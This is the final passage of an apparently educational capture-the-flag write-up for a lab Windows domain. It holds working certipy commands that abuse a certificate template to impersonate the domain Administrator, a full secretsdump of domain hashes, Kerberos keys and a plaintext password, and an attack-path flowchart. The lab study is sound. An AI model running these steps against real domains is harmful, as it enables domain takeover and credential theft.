certipy-ad template -u 'infiltrator_svc$@infiltrator.htb' \ -hashes :407546ca61cd7d3870e7dc6b0b007ecd \ -target dc01.infiltrator.htb \ -template Infiltrator_Template \ -save-old[*] Saved old configuration for 'Infiltrator_Template' to 'Infiltrator_Template.json'[*] Updating certificate template 'Infiltrator_Template'[*] Successfully updated 'Infiltrator_Template'certipy-ad req -u 'infiltrator_svc$@infiltrator.htb' \ -hashes :407546ca61cd7d3870e7dc6b0b007ecd \ -target dc01.infiltrator.htb \ -ca infiltrator-DC01-CA \ -template Infiltrator_Template \ -upn administrator@infiltrator.htbCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC[*] Successfully requested certificate[*] Request ID is 10[*] Got certificate with UPN 'administrator@infiltrator.htb'[*] Certificate has no object SID[*] Saved certificate and private key to 'administrator.pfx'certipy-ad auth -u 'administrator' \ -domain infiltrator.htb \ -dc-ip 10.129.156.109 \ -pfx administrator.pfxCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Using principal: administrator@infiltrator.htb[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for 'administrator'[*] Got hash for 'administrator@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1
Authenticating with the newly requested certificate also returns the NTLM hash for Administrator, that I can use to log in interactively to read the final flag and also to run secretsdump to grab the hashes from all users within the domain.
impacket-secretsdump -hashes :1356f502d2764368302ff0369b1121a1 \ INFILTRATOR.HTB/Administrator@dc01.infiltrator.htbImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies[*] Target system bootKey: 0xb69149edc42a85733e4efe5e35a33e87[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:4dc8e10f3a29237b05bdfdb5bded5451:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACCINFILTRATOR\DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435dINFILTRATOR\DC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556INFILTRATOR\DC01$:des-cbc-md5:80fe9dbfa22531abINFILTRATOR\DC01$:plain_password_hex:0a3183391dac772712b98e94fead3b9456bfedcc57c953d18084f50e94cf42d6c08434a1d3217c2fe151916a0ae7867c415ab8d3546f4ecc4707410ca56e2556aef2298066f7842ec1ad4819706032c10db5d22ff762c9a4fdeb82405627c04ed0ae8ee0514170acb1f0fa8964a2d045ba16b749ef89933bccd53b25a8aa0f5d17c2d519f9aa7a939b1fb9701bb88a1abb5efdfbcd02226e09032d8ffced8801e6cf8adf16bceb1491482d23a8281326cc82a6fa06425336d1422cd3b1cadd389263a9f557ce5221a86b28a71dc6276a0ac8165b7c5c5929dd3998130bbd7b9e41b9a8e4d69e1b7a614f25b6a8aa672bINFILTRATOR\DC01$:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::[*] DefaultPasswordINFILTRATOR\Administrator:Infiltrator_Box1337![*] DPAPI_SYSTEMdpapi_machinekey:0xbd8a15f7e24918ac40db6b340498aeda032c4fc0dpapi_userkey:0xf0f81997f3c057103ab87ac71dc986c455880e83[*] NL$KM 0000 A9 F8 C1 38 F1 FB 53 1A E1 12 CA 8A 61 D3 C1 D6 ...8..S.....a... 0010 67 09 77 BC BC C6 BC 2F 5D E3 18 3D 66 DB 6D 9F g.w..../]..=f.m. 0020 03 30 80 2D 25 9F 69 56 39 55 EA A3 50 D0 CA 0F .0.-%.iV9U..P... 0030 C6 18 45 14 9E 8E B6 3C 46 49 6F 3B FA EF FE 89 ..E....<FIo;....NL$KM:a9f8c138f1fb531ae112ca8a61d3c1d6670977bcbcc6bc2f5de3183d66db6d9f0330802d259f69563955eaa350d0ca0fc61845149e8eb63c46496f3bfaeffe89[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d400d2ccb162e93b66e8025118a55104:::infiltrator.htb\D.anderson:1103:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::infiltrator.htb\L.clark:1104:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88:::infiltrator.htb\M.harris:1105:aad3b435b51404eeaad3b435b51404ee:3ed8cf1bd9504320b50b2191e8fb7069:::infiltrator.htb\O.martinez:1106:aad3b435b51404eeaad3b435b51404ee:daf40bbfbf00619b01402e5f3acd40a9:::infiltrator.htb\A.walker:1107:aad3b435b51404eeaad3b435b51404ee:f349468bb2c669ec8c3fd4154fdfe126:::infiltrator.htb\K.turner:1108:aad3b435b51404eeaad3b435b51404ee:a119c0d5af383e9591ebb67857e2b658:::infiltrator.htb\E.rodriguez:1109:aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56:::infiltrator.htb\winrm_svc:1601:aad3b435b51404eeaad3b435b51404ee:120c6c7a0acb0cd808e4b601a4f41fd4:::infiltrator.htb\lan_managment:8101:aad3b435b51404eeaad3b435b51404ee:a1983d156e1d0fdf9b01208e2b46670d:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:c4d8ecef85fdd70a87fa9c8da56a417f:::infiltrator_svc$:3102:aad3b435b51404eeaad3b435b51404ee:407546ca61cd7d3870e7dc6b0b007ecd:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:9d9ae321762ce3d90ff7835a9e9a8fe453bcc3b35c0cb212326e0efb2e8b29baAdministrator:aes128-cts-hmac-sha1-96:762b10a1e2296a49bab7da1ce32755edAdministrator:des-cbc-md5:0497041f3e5d2598krbtgt:aes256-cts-hmac-sha1-96:673c00e9dd5ca94e9be6312a159fc1c4e2ef95792ec45f867ec2c1ad439f3150krbtgt:aes128-cts-hmac-sha1-96:674de1e736dbefda6f24dd914e598d79krbtgt:des-cbc-md5:a4b9c73bc4a46bcdinfiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403finfiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfcinfiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefdinfiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:90dd4ed523ecc25972afe0b133cad79d5c5b88e6bc5cd1a8d2920ccb45b15596infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:bf1e51ae7fa659e146833d8de8ff3d17infiltrator.htb\M.harris:des-cbc-md5:7fabf8e6e5678a67infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:d497f5a48df0dd55d34c79c7893867a3aad8b222dc7f41af67a1476735c9ed75infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:a062fd39eee45a7ceea3f8e5b7525d10infiltrator.htb\O.martinez:des-cbc-md5:70f8164a9713ba8cinfiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:cbaeaefb06f17d3eb1d49550e5714fbdf517922c841375cd6a6cd750aa5e3efeinfiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:27b89dea58e7a98cfadc60b2af7ab568infiltrator.htb\A.walker:des-cbc-md5:a4515dd5d09be9b9infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:0f75078e57f71485606fef572b36a278645e2053438e8596c48be7e41e56055ainfiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:fb14214da9c033aa04c0d559abbd3f7ainfiltrator.htb\K.turner:des-cbc-md5:b94a5d234307459binfiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:52c2444473f775e05ba01744af63901249a018ade7369a262981ce3aeede220ainfiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:9988b989a3d40045326f8908094a79beinfiltrator.htb\E.rodriguez:des-cbc-md5:2f013eea29c7f237infiltrator.htb\winrm_svc:aes256-cts-hmac-sha1-96:61f308b54f3b17ed48c2877c775a6aa37789b46c1741e356f6fcdab75373d1cainfiltrator.htb\winrm_svc:aes128-cts-hmac-sha1-96:1d454266ab84bfe7ce7bb03e48a23ac7infiltrator.htb\winrm_svc:des-cbc-md5:01ce70109ecea73binfiltrator.htb\lan_managment:aes256-cts-hmac-sha1-96:e66b410341a87c4f1ff382e9c4e3e26d0a351de2ebea9ba0d234b7713cfb0ce6infiltrator.htb\lan_managment:aes128-cts-hmac-sha1-96:5bf2b52baf80470a2dfe5466c44e9896infiltrator.htb\lan_managment:des-cbc-md5:b6044c94896e57f1DC01$:aes256-cts-hmac-sha1-96:15db1652b02a83f4324bd8ba4f2a20eb8ea7631bf87dfec2d4f97ebeff32435dDC01$:aes128-cts-hmac-sha1-96:70d8ad0059f5e81f43310c34e9937556DC01$:des-cbc-md5:fb2954402cd32f5einfiltrator_svc$:aes256-cts-hmac-sha1-96:dde8b959997f0901f1f637ef42744eca4ab16e2ece74cbbd78b7d75a508d9fd5infiltrator_svc$:aes128-cts-hmac-sha1-96:9ba9a006372fba0d97c3c0ce8610d21dinfiltrator_svc$:des-cbc-md5:c44a5129ece6fd8f[*] Cleaning up...
Attack Path
flowchart TD
subgraph "Initial access"
A(Webpage) -->|Scrape for Users| B(List of potential names)
B -->|username-anarchy| C(Permutations of usernames)
C -->|User Enumeration via Kerberos| D(Valid usernames)
D -->|ASREPRoasting| E(Hash for l.clark)
E -->|Crack Hash| F(Access as l.clark)
F -->|List users and description| Z(Credentials for k.turner)
end
subgraph "Execution"
F -->|Check for password reusage| G(Access as d.anderson)
G -->|Add GenericAll to group and members| H(Access as e.rodriguez)
H -->|Reset Password| I(Access as m.harris)
I -->|Remote Management User| J(Shell as m.harris)
end
subgraph "Privilege Escalation"
J & Z -->|Access to Chat Application| K(Credentials for chat as m.harris)
K -->|Shared Binary with hardcoded creds| L(Access as winrm_svc)
L -->|API Key & Local artefacts| M(Chat History)
M -->|Shared Password| N(Chat access as o.martinez)
N -->|Calendar entry running a file| O(Shell as o.martinez)
O -->|Shared file: packet capture| P(Creds for o.martinez) & Q(Bitlocker-backup.7z)
Q -->|Crack Password| R(Bitlocker Recovery Key)
P -->|Access to RDP| P1(Interactive Session)
P1 & R -->|Access to Bitlocker Drive| S(NTDS.dit backup)
S -->|Password in Description| T(Access as lan_managment)
T -->|ESC4| U(Access as Administrator)
end
